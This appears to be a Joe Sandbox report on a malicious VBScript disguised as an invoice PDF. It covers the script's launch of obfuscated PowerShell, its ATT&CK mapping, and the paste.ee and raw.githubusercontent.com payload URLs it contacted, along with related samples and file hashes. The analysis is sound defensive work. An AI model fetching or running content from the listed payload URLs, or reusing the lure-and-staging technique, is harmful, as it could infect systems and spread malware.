Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting		Valid Accounts2
Windows Management Instrumentation		221
Scripting		11
Process Injection		31
Virtualization/Sandbox Evasion		OS Credential Dumping11
Security Software Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		11
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution		Logon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
PowerShell		Login HookLogin Hook2
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets1
Remote System Discovery		SSHKeylogging3
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync2
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem32
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525548 Sample: FAKTURA-pdf-466366332.vbs Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 28 paste.ee 2->28 30 raw.githubusercontent.com 2->30 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Multi AV Scanner detection for submitted file 2->48 52 8 other signatures 2->52 8 wscript.exe 1 2->8         started        signatures3 50 Connects to a pastebin service (likely for C&C) 28->50 process4 signatures5 54 VBScript performs obfuscated calls to suspicious functions 8->54 56 Suspicious powershell command line found 8->56 58 Wscript starts Powershell (via cmd or directly) 8->58 60 3 other signatures 8->60 11 cmd.exe 1 8->11         started        14 powershell.exe 7 8->14         started        process6 signatures7 62 Wscript starts Powershell (via cmd or directly) 11->62 64 Uses ping.exe to sleep 11->64 66 Uses ping.exe to check the status of other devices and networks 11->66 16 powershell.exe 7 11->16         started        19 PING.EXE 1 11->19         started        22 conhost.exe 11->22         started        68 Suspicious powershell command line found 14->68 70 Obfuscated command line found 14->70 24 powershell.exe 14 15 14->24         started        26 conhost.exe 14->26         started        process8 dnsIp9 38 Suspicious powershell command line found 16->38 40 Obfuscated command line found 16->40 42 Found suspicious powershell code related to unpacking or dynamic code loading 16->42 32 127.0.0.1 unknown unknown 19->32 34 paste.ee 188.114.96.3, 443, 49709 CLOUDFLARENETUS European Union 24->34 36 raw.githubusercontent.com 185.199.108.133, 443, 49707 FASTLYUS Netherlands 24->36 signatures10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
FAKTURA-pdf-466366332.vbs10%VirustotalBrowse
FAKTURA-pdf-466366332.vbs5%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://crl.microsoft0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://aka.ms/pscore60%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
paste.ee
188.114.96.3
truetrue
    		unknown
    raw.githubusercontent.com
    		185.199.108.133
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
        		unknown
        https://paste.ee/d/DjfVC/0true
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.cloudflare.com/learning/access-management/phishing-attack/powershell.exe, 00000008.00000002.1667066849.000001B9C8334000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8359000.00000004.00000800.00020000.00000000.sdmpfalse
            		unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1698437670.000001B9D7E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.1667066849.000001B9C953C000.00000004.00000800.00020000.00000000.sdmpfalse
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1667066849.000001B9C975C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://paste.eepowershell.exe, 00000008.00000002.1667066849.000001B9C826E000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                http://crl.microsoftpowershell.exe, 00000008.00000002.1732092735.000001B9DFFF0000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1667066849.000001B9C975C000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://go.micropowershell.exe, 00000008.00000002.1667066849.000001B9C90BD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://raw.githubusercontpowershell.exe, 00000008.00000002.1667066849.000001B9C94EE000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://paste.eepowershell.exe, 00000008.00000002.1667066849.000001B9C826E000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://aka.ms/pscore6powershell.exe, 00000005.00000002.1609296916.000002641E67B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1667066849.000001B9C975C000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000008.00000002.1667066849.000001B9C8215000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8334000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8349000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://crl.mpowershell.exe, 00000008.00000002.1730333035.000001B9DFE59000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://raw.githubusercontent.compowershell.exe, 00000008.00000002.1667066849.000001B9C90BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8043000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://contoso.com/powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1698437670.000001B9D7E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://raw.githubusercontent.compowershell.exe, 00000008.00000002.1667066849.000001B9C94F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://oneget.orgXpowershell.exe, 00000008.00000002.1667066849.000001B9C953C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://aka.ms/pscore68powershell.exe, 00000005.00000002.1609296916.000002641E699000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1748319451.0000024F8005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1748319451.0000024F80027000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C7E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1609296916.000002641E6CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1748319451.0000024F80085000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C7E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://oneget.orgpowershell.exe, 00000008.00000002.1667066849.000001B9C953C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                188.114.96.3
                                		paste.eeEuropean Union
                                		13335CLOUDFLARENETUStrue
                                185.199.108.133
                                		raw.githubusercontent.comNetherlands
                                		54113FASTLYUSfalse

                                Private

                                IP
                                127.0.0.1

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1525548
                                Start date and time:2024-10-04 11:24:03 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 55s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:15
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:FAKTURA-pdf-466366332.vbs
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winVBS@13/7@2/3
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 14
                                • Number of non-executed functions: 1
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 88.221.110.91, 2.16.100.168, 40.69.42.241, 13.95.31.18
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                • Execution Graph export aborted for target powershell.exe, PID 4832 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 4844 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 5944 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                05:25:19API Interceptor39x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                188.114.96.3QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                • filetransfer.io/data-package/eZFzMENr/download
                                1tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                                • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                                http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                • asm.alcateia.org/
                                hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                                z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                • www.bayarcepat19.click/g48c/
                                update SOA.exeGet hashmaliciousFormBookBrowse
                                • www.bayarcepat19.click/5hcm/
                                docs.exeGet hashmaliciousFormBookBrowse
                                • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                                https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                • wwvmicrosx.live/office365/office_cookies/main/
                                http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                                http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                                • mobilelegendsmycode.com/favicon.ico
                                185.199.108.133Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                  http://www.freemangas.comGet hashmaliciousUnknownBrowse
                                    SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                      NhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                        risTLdc664.vbsGet hashmaliciousFormBookBrowse
                                          uLfuBVyZFV.vbsGet hashmaliciousUnknownBrowse
                                            iJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                                              mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                http://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
                                                  asegura.vbsGet hashmaliciousRemcosBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    raw.githubusercontent.comPDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                    • 185.199.109.133
                                                    CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                    • 185.199.110.133
                                                    UfsYHroDY1.rtfGet hashmaliciousFormBookBrowse
                                                    • 185.199.110.133
                                                    8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                    • 185.199.110.133
                                                    A&CMetrology_10002099678.xlsGet hashmaliciousRemcosBrowse
                                                    • 185.199.109.133
                                                    Airwaybill#0587340231024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                    • 185.199.110.133
                                                    Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                                    • 185.199.108.133
                                                    https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                                    • 185.199.111.133
                                                    https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                                    • 185.199.111.133
                                                    http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                                                    • 185.199.111.133
                                                    paste.eePDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.96.3
                                                    SKMBT_77122012816310TD0128_17311_XLS.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.97.3
                                                    Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.96.3
                                                    sostener.vbsGet hashmaliciousNjratBrowse
                                                    • 188.114.97.3
                                                    sostener.vbsGet hashmaliciousXWormBrowse
                                                    • 188.114.96.3
                                                    NhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.96.3
                                                    risTLdc664.vbsGet hashmaliciousFormBookBrowse
                                                    • 188.114.97.3
                                                    NTiwJrX4R4.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • 188.114.97.3
                                                    o45q0zbdwt.vbsGet hashmaliciousPureLog StealerBrowse
                                                    • 188.114.97.3
                                                    OIQ1ybtQdW.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • 188.114.96.3

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSQUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    Payment Advice Note.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    Transfer.lnkGet hashmaliciousHTMLPhisherBrowse
                                                    • 188.114.96.3
                                                    Pago1032024.lnkGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    https://iasitvlife.roGet hashmaliciousUnknownBrowse
                                                    • 104.17.25.14
                                                    Transfer.lnkGet hashmaliciousHTMLPhisherBrowse
                                                    • 188.114.97.3
                                                    Transfer.lnkGet hashmaliciousHTMLPhisherBrowse
                                                    • 188.114.97.3
                                                    https://iasitvlife.ro/stiri/local/a-sunat-la-call-center-anticoruptie-si-a-denuntat-un-functionar-public/Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    Pago1032024.lnkGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    FASTLYUShttps://iasitvlife.roGet hashmaliciousUnknownBrowse
                                                    • 151.101.66.217
                                                    https://iasitvlife.ro/stiri/local/a-sunat-la-call-center-anticoruptie-si-a-denuntat-un-functionar-public/Get hashmaliciousHTMLPhisherBrowse
                                                    • 199.232.192.193
                                                    PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                    • 185.199.109.133
                                                    https://t.co/dvIdjH2XsvGet hashmaliciousUnknownBrowse
                                                    • 199.232.188.159
                                                    http://185.95.84.78/rd/4gmsyP17223JZmx332lihotmtcwn9842ZSCGIOAIIATLJCU85240TITV3606d9Get hashmaliciousPhisherBrowse
                                                    • 151.101.65.44
                                                    faststone-capture_voLss-1.exeGet hashmaliciousPureLog StealerBrowse
                                                    • 199.232.214.172
                                                    PRODUCTTS SPECIFICATIONS.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.194.137
                                                    https://link.edgepilot.com/s/527f3b22/IsEZW0vVpU28AdY1bja1GQ?u=https://securemail.wf.com/s/e?m=ABDLG7Db88ZOC03NJzhZQA0p%26c=ABCnBKdwqhBBe4jHrIQNGJMjGet hashmaliciousUnknownBrowse
                                                    • 151.101.2.137
                                                    https://new.express.adobe.com/webpage/41htgUlKyaibOGet hashmaliciousUnknownBrowse
                                                    • 151.101.129.138
                                                    http://masdeliveryusa.com/Get hashmaliciousUnknownBrowse
                                                    • 151.101.194.137

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eQUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 185.199.108.133
                                                    • 188.114.96.3
                                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 185.199.108.133
                                                    • 188.114.96.3
                                                    Payment Advice Note.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 185.199.108.133
                                                    • 188.114.96.3
                                                    Transfer.lnkGet hashmaliciousHTMLPhisherBrowse
                                                    • 185.199.108.133
                                                    • 188.114.96.3
                                                    Pago1032024.lnkGet hashmaliciousUnknownBrowse
                                                    • 185.199.108.133
                                                    • 188.114.96.3
                                                    Transfer.lnkGet hashmaliciousHTMLPhisherBrowse
                                                    • 185.199.108.133
                                                    • 188.114.96.3
                                                    Transfer.lnkGet hashmaliciousHTMLPhisherBrowse
                                                    • 185.199.108.133
                                                    • 188.114.96.3
                                                    Pago1032024.lnkGet hashmaliciousUnknownBrowse
                                                    • 185.199.108.133
                                                    • 188.114.96.3
                                                    Pago1032024.lnkGet hashmaliciousUnknownBrowse
                                                    • 185.199.108.133
                                                    • 188.114.96.3
                                                    Pago1032024.lnkGet hashmaliciousUnknownBrowse
                                                    • 185.199.108.133
                                                    • 188.114.96.3

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:@...e...........................................................

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34debwim.wtp.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4rrfpgxc.ks2.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alcz2i0u.sd4.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gn5cpp5x.0d5.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
